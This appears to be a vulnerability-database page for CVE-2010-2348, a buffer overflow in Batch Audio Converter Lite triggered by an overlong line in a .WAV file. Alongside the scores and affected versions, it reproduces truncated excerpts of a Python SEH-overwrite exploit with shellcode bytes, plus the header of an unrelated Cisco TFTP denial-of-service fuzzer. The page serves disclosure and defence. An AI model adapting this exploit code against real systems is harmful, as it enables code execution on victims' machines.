CVE-2010-2348
published 2010-06-21CVE-2010-2348: Stack-based buffer overflow in Batch Audio Converter Lite Edition 1.0.0.0 and earlier allows remote attackers to execute arbitrary code via a long line in a…
PriorityP348critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
5.58%
91.9th percentile
Stack-based buffer overflow in Batch Audio Converter Lite Edition 1.0.0.0 and earlier allows remote attackers to execute arbitrary code via a long line in a .WAV file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freesoftwaretoolbox | batch_audio_converter | <= 1.0.0.0 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Batch Audio Converter Lite Edition 1.0.0.0 - Local Stack Buffer Overflow (SEH)
exploitdb·2010-06-17
CVE-2010-2348 Batch Audio Converter Lite Edition 1.0.0.0 - Local Stack Buffer Overflow (SEH)
Batch Audio Converter Lite Edition 1.0.0.0 - Local Stack Buffer Overflow (SEH)
---
# Software Link:
http://www.freesoftwaretoolbox.com/files/batchaudio_setup.exe
# Tested on: Windows XP SP2
# Type of Vuln: SEH
# Code : bacon-exploit.py
# Greetz: Otoy, Postnix, Jasakom Community, Kilurah, Gesang, dan wedus-wedus
lainnya ^^
# Thanks: All OffSec member
#!/usr/bin/python
import struct
junk = "A" * 4132
nseh = "\xeb\x06\x90\x90"
seh = struct.pack('<L', 0x10029bb7) # pop edi pop esi ret from
lame_enc.dll
nop = "\x90" * 30
print "[+] Preparing for file.."
# windows/exec, CMD=calc.exe, EXITFUNC=seh
# 463 bytes, x86/alpha_mixed
shellcode = ("\x89\xe3\xdb\xc6\xd9\x73\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b
Exploit-DB
Cisco TFTP Server 1.1 - Denial of Service
exploitdb·2010-03-25
CVE-2010-1174 Cisco TFTP Server 1.1 - Denial of Service
Cisco TFTP Server 1.1 - Denial of Service
---
# Exploit Title: [Cisco TFTP Server 1.1]
# Date: [2010-03-25]
# Author: [_SuBz3r0_]
# Software Link: [http://www.oldversion.com/Cisco_TFTP_Server.html]
# Version: [1.1]
# Tested on: [XP SP3,Win2k3]
# CVE : [if exists]
# Code :
#Cisco TFTP Server v1.1 DoS
print ""
print "##############################################"
print "# _SuBz3r0_ #"
print "##############################################"
print ""
print "Cisco TFTP v1.1 Remote DoS"
print "Just For Fun"
print "tftp_fuzz.py [ip of server]"
print ""
print "Greetz:piloo le canari & MaX"
print "Credits to Ilja van Sprundel"
print "Tested on: French Windows Xp Sp3 fully Patched"
print ""
#!/usr/bin/python
# tftpd fuzzer by Ilja van Sprundel
# implements rfc 1350, 2090, 2347, 2348, 2349
#
# tod
No writeups or analysis indexed.
http://secunia.com/advisories/40254http://www.exploit-db.com/exploits/13909http://www.securityfocus.com/bid/40940https://exchange.xforce.ibmcloud.com/vulnerabilities/59526http://secunia.com/advisories/40254http://www.exploit-db.com/exploits/13909http://www.securityfocus.com/bid/40940https://exchange.xforce.ibmcloud.com/vulnerabilities/59526
2010-06-21
Published